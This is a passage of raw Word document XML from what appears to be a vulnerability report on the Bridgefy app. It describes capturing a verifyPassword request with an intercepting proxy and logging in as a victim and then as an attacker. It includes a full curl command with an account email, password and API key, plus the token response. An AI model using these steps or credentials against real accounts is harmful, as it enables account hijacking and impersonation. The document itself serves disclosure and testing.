        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ZAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Fiddler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37" w:after="0"/>
        <w:ind w:left="1440" w:right="567" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“/identitytoolkit/v3/relyingparty/verifyPassword”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>down the email and password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="781" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId45">
        <w:r>
          <w:rPr>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>(+12064512559@bridgefy.app)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>victim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>there</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> line</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>obtained</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>obtain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>valid token and login as the MQTT attacker user:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(obtain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>token):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{</w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>"email":"+12012987481@bridgefy.app","password":"2a910bc17434409c4c19"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,"returnSecureTo ken":true}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyB8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> VIwqxpf79NhC27fMLsiJvxazGeumAWU'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="82"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"kind"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"identitytoolkit#VerifyPasswordResponse"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="917" w:right="4309" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"localId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bWn0pw2t35UPOPO71GcPuhrqiMy1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>"+12012987481@bridgefy.app"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"+12012987481"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>idToken"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"eyJhbGciOiJSUzI1NiIsImtp[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487592960">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>98167</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="21" name="Graphic 21"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
